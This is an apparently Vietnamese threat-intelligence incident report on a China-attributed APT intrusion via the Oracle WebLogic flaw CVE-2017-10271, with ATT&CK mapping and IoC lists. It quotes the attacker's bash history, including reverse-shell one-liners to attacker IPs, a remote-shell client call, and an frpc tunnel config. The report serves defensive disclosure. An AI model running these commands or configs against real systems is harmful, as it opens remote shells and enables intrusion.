TỔNG QUAN
Bên cạnh các hoạt động ứng phó sự cố (Incident Response) cho các khách hàng trong bối cảnh gia tăng các cuộc tấn công mã hóa Ransomware, đội ngũ kỹ thuật NCS cũng luôn theo dõi và ứng phó các chiến dịch tấn công APT nhắm đến Việt Nam. Thông qua quá trình điều tra xử lý sự cố, NCS nhận thấy một số trùng lặp về cách thức tấn công, công cụ cũng như cơ sở hạ tầng mà nhóm tấn công sử dụng đã từng được mô tả trong các báo cáo được chia sẻ trước đó, liên quan đến nhóm tấn công đến từ Trung Quốc. Nhóm tấn công này thực hiện các chiến dịch tấn công nhắm mục tiêu tới các đơn vị tổ chức thuộc Việt Nam trong khoảng thời gian giữa năm 2023 trở lại đây.
TÓM TẮT
-
- Thông qua điều tra xử lý sự cố, đội ngũ NCS truy vết được attack vector, các công cụ mà nhóm tấn công sử dụng cũng như các kết nối đến cơ sở hạ tầng của nhóm tấn công.
- Với các dữ liệu thu thập và phân tích cùng những thông tin từ các báo cáo của các bên thứ 3 đã công bố trước đó, Threat Intelligence Team NCS gán các hoạt động tấn công đến nhóm tấn công từ Trung Quốc.
- Chúng tôi cung cấp các indicators đã phát hiện tới cộng đồng, góp phần cho công việc tracking các nhóm tấn công, các indicators này cũng có thể được cập nhật vào các giải pháp bảo mật nhằm củng cố phòng thủ cũng như rà soát thêm hệ thống (Các indicators được mô tả đầy đủ trong phụ lục A: Indicators of Compromises (IoCs))
PHÂN TÍCH
Incident Reponse
Quá trình xử lý sự cố đội xử lý sự cố NCS phát hiện nhóm tấn công thông qua khai thác lỗ hổng bảo mật cho phép thực thi mã tùy ý trên hệ thống bị ảnh hưởng, nhóm tấn công drop webshell và các công cụ tấn công (hầu hết đều là opensource) xuống máy chủ nhằm leo thang đặc quyền, dò quét dải mạng, dump credential, thiết lập các cấu hình tunnel, proxy cũng như thiết lập các kết nối tới các IP được nghi ngờ là C&C nằm trong cơ sở hạ tầng của kẻ tấn công, cụ thể:
Initial Access
Nhóm tấn công thực hiện khai thác ứng dụng được Public-Facing ra môi trường Internet thông qua lỗ hổng – CVE-2017-10271 Oracle WebLogic wls-wsat Component Deserialization RCE. Lỗ hổng tồn tại trong thành phần wls-wsat của Oracle WebLogic phiên bản 12.2.1.2.0 và các phiên bản trước đó do quá trình deserialization không được xử lý đúng cách. Khai thác thành công cho phép nhóm tấn công thực thi các đoạn mã tùy ý trên hệ thống bị ảnh hưởng, từ đó có thể drop các tệp tin độc hại như webshell. Trong các entrypoint có thể lạm dụng để khai thác, kết quả phân tích ghi nhận /CoordinatorPortType11 là entrypoint bị lạm dụng để khai thác.
Execution
Sau khi khai thác thành công lỗ hổng, nhóm tấn công thực hiện tải xuống các file công cụ và thực thi các câu lệnh với tài khoản chạy dịch vụ weblogic.
Ngoài ra, kết quả điều tra cũng cho thấy nhóm tấn công đã chiếm được quyền root trên máy chủ, thực thi nhiều câu lệnh cũng như các tệp tin độc hại nhằm dò quét cũng như khởi tạo kết nối (được ghi nhận trong bash_history của tài khoản root).
telnet 182.93.84.21 42131 (8088, 8291) chmod a+x 66.elf (mettlesploit) ./66.ef bash -i >& /dev/tcp/185.14.30.135/443 0>&1 bash -i >& /dev/tcp/154.39.153.42/8888 0>&1 ping baidu.com ./bs -h 106.52.166.241 -p 12308 (blueshell) …………………………………………………………… |
Persistence
Ngoài các webshell được drop trên disk, nhóm tấn công sử dụng thêm memshell (một dạng webshell được inject trong memory gây khó khăn hơn trong quá trình phát hiện). Nhóm tấn công sử dụng opensource memshell để triển khai webshell dạng này.
Privilege Escalation
Các bằng chứng trên máy chủ bị tấn công không đủ để xác định chính xác phương thức leo thang đặc quyền nhưng máy chủ này được ghi nhận đã từng sử dụng mật khẩu yếu với tài khoản root (phát hiện mật khẩu yếu đi kèm tài khoản root trong output của fscan, bash history cũng ghi nhận câu lệnh thực thi fscan cùng tham số -pwd). Kiểm tra tiến trình cũng phát hiện việc sử dụng python và netcat để khởi tạo reverse shell và thực thi script Linpeas cho phép tìm kiếm các điểm yếu bảo mật cũng như lỗ hổng có thể lạm dụng để leo thang đặc quyền.
Ngoài ra đội ngũ điều tra cũng phát hiện bộ công cụ khai thác lỗ hổng trong polkit – CVE-2021-4034 (a.k.a Pwnkit) được tải xuống và thực thi trên máy chủ bị tấn công. Tuy nhiên, kết quả điều tra cho thấy quá trình thực thi khai thác không thành công leo thang đặc quyền.
Credential Access
Nhóm tấn công thực hiện hành vi thu thập thông tin tài khoản đăng nhập trên máy chủ thông qua sử dụng các công cụ giải mã mật khẩu weblogic và mimipenguin.
Discovery
Phát hiện nhóm tấn công tải xuống và thực thi đa dạng các công cụ opensource trên máy chủ bị tấn công. Các công cụ này hỗ trợ cho quá trình dò quét cổng (port), dịch vụ cũng như scan một số lỗ hổng bao gồm: Fscan, TideFinger kscan, netspy và Netouter.
Command and Control
Các công cụ hỗ trợ tunnel, proxy được phát hiện bao gồm Frp, Stowaway, rsocks, ew. Bên cạnh đó, đội ngũ xử lý cũng ghi nhận các tệp tin mã độc có các tính năng tạo kết nối tới các địa chỉ IP nghi ngờ C&C bao gồm Blueshell, Xnote, Mettlesploit, SprankRAT và biến thể của Gh0stRAT.
ATTRIBUTION
-
- Trong các command được nhóm tấn công thực thi, phát hiện nhóm tấn công kiểm tra hoặc thiết lập kết nối tới nhiều địa chỉ IP. Một số IP khác được ghi nhận trong config của fast reverse proxy và tham số trong câu lệnh thực thi của Stowaway
#bash_history 182.93.84.21 (42131, 8088, 8291) (telnet, ping) 185.14.30.135 (443,53,7003,58068), 154.39.153.42:8888, 175.178.0.20:8001) bash_shell 106.52.166.241:12308 thiết lập tham số cho Blueshell client 154.39.248.121 (curl) #frpc [common] server_addr = 64.176.85.105 server_port = 7000 use_encryption = true use_compression = true [socks5] type = tcp remote_port = 1050 plugin = socks5 #Stowaway ./L -c 206.189.244.183:58888 |
-
- Trong số các IP đã mô tả ở trên, IP 106[.]52.166[.]241 được ghi nhận là C&C của metasploit có vị trí địa lý tại Quảng Châu, Trung Quốc. IP 206.189[.]244.183 được ghi nhận là C&C Cobaltstrike sử dụng chung jQuery malleable profile đã được phát hiện trước đó.
- Thông qua quá trình rà soát, thu thập và phân tích các tệp tin mã độc ghi nhận các địa chỉ IP 45[.]77.174[.]174:80 và 38[.]54.119[.]156:18080 và domain b[.]niupilao[.]vip:80 là các C&C server.
-
- Địa chỉ 45[.]77.174[.]174:80 được khởi tạo kết nối từ backdoor Xnote (tệp tin ELF iptable6 nằm tại đường dẫn “/bin/iptable6”), kết nối này vẫn được ghi nhận trong quá trình rà soát.
-
- Địa chỉ IP 38[.]54.119[.]156:18080 được ghi nhận khởi tạo từ RAT Spark (./pki ; ./356), RAT Spark cũng từng được mô tả trong báo cáo của Sentinelone, được cho là có liên quan đến Chinese-speaking threat actor.
- Domain b[.]niupilao[.]vip được khởi tạo kết nối từ backdoor (biến thể của Gh0stRAT), phân tích từ tệp tin tại đường dẫn “/tmp/CCCCCCCC”
- Ngoài ra, cũng phát hiện việc nhóm tấn công có thử kết nối tới website thuộc Tổng Cục Hải Quan tỉnh Quảng Trị (quangtri.customs.gov.vn) thông qua curl command, các báo cáo trong 2023 của Recordedfuture cũng mô tả về các hành vi tác động tới các cơ quan đơn vị thuộc Chính phủ Nhà nước Việt Nam của nhóm tấn công RedHotel bao gồm chiếm quyền điều khiển của Viện Khoa học tổ chức nhà nước Việt Nam – isos.gov.vn và đánh cắp TLS certificate của Bộ Giáo dục và Đào tạo – moet.gov.vn.
- Phân tích access log, phát hiện nhiều IP cùng truy cập đến 2 webshell “MD18.jsp” và “S8n1.jsp” trong một thời gian dài. Trong đó có IP 156[.]146.56[.]136 cũng được Volexity ghi nhận trong 1 chiến dịch tấn công trước đây.
Dựa trên các kết quả điều tra và phân tích về TTP và cơ sở hạ tầng được sử dụng, đội ngũ TI NCS nhận định chiến dịch tấn công được thực hiện bởi nhóm tấn công đến từ Trung Quốc.
MITRE ATT&CK
Tactics | Techniques | Description |
Initial Access | [T1190] Exploit Public-Facing Application | Khai thác lỗ hổng CVE-2017-10271 cho phép thực thi mã tùy ý, drop các file độc hại |
Execution | [T1059.004] Command and Scripting Interpreter: Unix Shell | Kẻ tấn công sử dụng /bin/bash và /bin/sh để thực thi câu lệnh |
[T1059.006] Command and Scripting Interpreter: Python | Kẻ tấn công sử dụng Python để tạo reverse shell | |
Persistence | [T1505.003] Server Software Component: Web Shell | Kẻ tấn công thực hiện upload webshell |
Privilege Escalation | [T1068] Exploitation for Privilege Escalation | Khai thác lỗ hổng CVE-2021-4034 (Pwnkit) để leo thang đặc quyền lên root, tuy nhiên kết quả điều tra ghi nhận khai thác không thành công |
[T1078.001] Valid Accounts: Default Accounts | Qua điều tra cho thấy kẻ tấn công có khả năng chiếm được tài khoản root thông qua mật khẩu yếu | |
Credential Access | [T1003.007] OS Credential Dumping: Proc Filesystem | Kẻ tấn công sử dụng mimipenguin để thu thập thông tin xác thực từ máy nạn nhân |
[T1212] Exploitation for Credential Access | Kẻ tấn công sử dụng công cụ giải mã mật khẩu weblogic | |
Discovery | [T1049] System Network Connections Discovery | Thực thi các công cụ trong quá trình dò quét |
Command and Control | [T1572] Protocol Tunneling | Kẻ tấn công sử dụng công cụ hỗ trợ tunnel và proxy |
[T1090] Proxy |
Phụ lục A: Indicator of Compromises (IoCs)
Tên File | Hash (SHA1) | Mô tả |
111 | 3722fb3d417bb4d08d4eed211fd1de237be5a94d | Pwnkit |
traditional | 52400d1432fa38582f529bf38286f76546d32664 | netcat |
356 | 39575c89f37ac1ae45bed734059bc7bca925f805 | SparkRAT |
s4 | f4866030cb84292cf493c4065712668478005f52 | fscan |
fscan | dc26aa1f01a3cb7c2ad487982efbcfe378d9acc6 | |
fscan32 | 5b0053f30a6572b422fd723997edd8bbc6210386 | |
a | 3b1329e81739b1ea6acbb4ec4dff11f02ff42570 | fscan |
ac | 3619c46f888b03d3c12379cb901877fb8880da20 | EarthWorm |
bJrEOb | daf915ca672e0100f0a9dd87f8194972d468f2d2 | Java archive – memshell |
L84RlS | d15f383a76ca01a93ee768da156cc1b31e0ff4ba | Java archive – memshell |
bs | 36cff870bad8009dadc399d14b41abb3afa3a341 | blueshell |
linpeas.sh | 7895f22df1ad0b154a9bf6da8d7479ca38f3afec | |
3.elf | f318463ec539069fd388544dadf2efe9a128ec11 | mettlesploit |
66.elf | 63858b2248b65b1d071b6540e591622c5ba119f4 | mettlesploit |
k | 57a26be3e175fe41fd2581cb7d9c95c7f0b14cf4 | kscan |
l | 8138eba6398650bdbf0c9483515fa5766ef3427a | Stowaway |
mimi.sh | a0267324300e453a55c727e7c9e20ba419e86260 | mimipenguin.sh |
netspy | 8c36cd8efd722d03bf60a03e0cde2837f1190b92 | netspy |
pki | a1d89a0e22a522c062d8f7c3b70a7ef1465d1c88 | SparkRAT |
ew_for_l | 3619c46f888b03d3c12379cb901877fb8880da20 | EarthWorm |
NetOuter | 368548d180c2e402dd1f3a53f7b46f71df3c9872 | NetOuter |
f64 | 7dbb1c0e421a49bad2a8dd867a1188df10c5f458 | |
bktest | 0b597560096064577282024a77c693da8eccb0bf | |
he1p | b0775d0f4e259fcfb336e9d1b1d45941c00be941 | |
CCCCCCCC | 1afd03b91e73db0de7685af473530503bc9257ff | variant Gh0stcat |
cve-2021-4034.sh | 636089FA2CACE9CC33F482D348E9DE8CB5CFC571 | |
TideFinger | 7DD9B575C0DCED8A0D7E22635220A18B601519D2 | |
iptable6 | eac13a0d88cc0d5fa1d9ebbbaa91c26fcbb962de | Xnote |
frpc | DE9FE0334E9E91F43C498519CDD8DDB010441F3F | fast reverse proxy |
s5c.py | 1563351B8AC708F6BE33083C9A84FC5857363255 | Reprocks – python socks5 proxy |
fr | ea10b9f49549286f27df24221e0d485c103a9c33 | rsocks |
tide.jsp | 2bafd82920b3de79303fda881bdac8c16f55b98a | webshell |
optdir.jsp | ef6f4561fecd17bc55534a3b96cecb4032b786c5 | |
gsl.jsp | 06c929038ddac1dbc5afa0d639fa770b88307870 | |
test11.jsp | c8e64e779c5dc2144a0ce47e56901abf42c20ae2 | |
test22.jsp | dfee8b38296870c42d4be2684cb60168269f108b | |
Login.jsp | 386321c7c345695f3061cdc9e87f649733470e5e | |
config1.jsp | ace8e049b5b4eb8f953a22549e7d5e8a4fb1eae6 | |
index.jspx | dc653db41dd07cd1642e7b1184351364f9f85483 | |
random.jsp | d4887f9df935e081796d08c00c31e2a65e05ae81 | |
1.jsp | 2dc7dec15ff62d7fdf62b1ead4569b091b9eec15 | |
2.jsp | 2dc7dec15ff62d7fdf62b1ead4569b091b9eec15 | |
cc.jsp | 571f21f28f92c0a4abad9491b0ebccbd4b37e3cd | |
n6eHIZ1.jsp | dfcda2b286613ee10b62ea36a98f894fdf5f9fe9 | |
n6eHIZ2.jsp | 8390d75807d001d039bf5ad5444b93f916f1ba57 | |
t111.jsp | ef2efba2f9a2a7a8e49004b8faa01b981bf8e3d1 | |
test33.jsp | c0782245dcb91a864924e730d77f29906003147c | |
Login.jsp | 386321c7c345695f3061cdc9e87f649733470e5e | |
index.jsp | 236c55ec9cb602bea610434dc4f7752a491795bb | |
1deW3i.jsp | 571a6796900888f32390008cd7e910ea4eb40193 | |
2deW3i.jsp | 6e56d6d6e41fe7fd9eb328453266f58ba8d1ba7f | |
3deW3i.jsp | 6b37ea71078e47be7eff16ede3257ab74692ed43 | |
MD18.jsp | b727eb2545c19536a8d42ff7279e47939cf3a9bc | |
S8n1.jsp | 0428a952e21101e3d4689d4439fdaa8c877ab097 | |
bakup.jsp | 2bd37f45fa552b0cabd07b58bbe2c9f8216eefe9 | |
bd1W.jsp | 5b4c741ec955ce3397ee0c57f07bff8ffd98c885 | |
bdD1W.jsp | a618121978ba1024dbddcfc39d60db267a0ed0fc | |
cbc.jsp | d7c5e3077010fb37092f6dedadc0616ae655724b | |
config_api.jsp | f0f74f11ff116954a68222553f8235c85b2218a1 | |
deW3i.jsp | 571a6796900888f32390008cd7e910ea4eb40193 | |
gsl.jsp | dd8ca78353638d275f36d864a79e8ac8b3a1eb17 | |
images.jsp | 26458d5ee84546db4d1b5aa87b2fe7ff2d620999 | |
info.jsp | e6c9730968b77116dbe1507b4a772357f61cbd97 | |
ini.jsp | e9da007db5059096936f06eac5aea16d17448a07 | |
opt.jsp | 39ff1d7667b74477334b9d80472021b44c7e8abe | |
optdir.jsp | 39ff1d7667b74477334b9d80472021b44c7e8abe | |
pk.jsp | 67b590af8d78547a03683e0cc314970d27de0305 |
C&C:
106[.]52.166[.]241
45[.]77.174[.]174:80
38[.]54.119[.]156:18080
b[.]niupilao[.]vip:80
185[.]14.30[.]135
154[.]39.153[.]42
175[.]178.0[.]20
Suspicious IP:
182.93.84.21
183.93.84.21
54.39.248.121
154.39.248.121
206.189.244.183
64.176.85.105
Danh sách các IP truy cập 2 webshell MD18.jsp và S8n1.jsp và các webshell có nội dung tương tự:
156.146.56.138
89.187.163.211
89.187.163.135
156.146.56.136
138.199.60.185
89.187.162.185
89.187.163.216
89.187.163.142
103.216.223.206
89.187.163.201
156.146.56.133
149.34.253.147
89.187.163.198
146.70.192.110
89.164.99.137
85.10.51.92
85.10.56.191
176.222.34.133
85.10.56.228
89.187.163.206
176.222.34.122
89.187.163.203
156.146.56.133
89.187.163.218
149.34.253.149
103.216.223.204
89.187.163.131
89.187.163.135
89.187.163.196
89.187.162.187
89.187.163.206
138.199.60.187
146.70.192.110
89.187.163.213
210.56.55.53
85.10.56.191
176.222.34.133
85.10.56.228
85.10.51.92
89.164.99.137
54.255.35.159
209.146.30.250
8.213.196.159
45.154.12.215
107.172.140.33
104.243.17.81
149.154.161.201
103.186.117.224
165.22.243.96
122.100.249.253
103.45.64.232
38.94.109.209
149.154.161.204
149.154.161.246
124.105.3.211
3.39.225.57
149.154.161.199
149.154.161.219
176.222.34.122
Author: NCS Threat Intel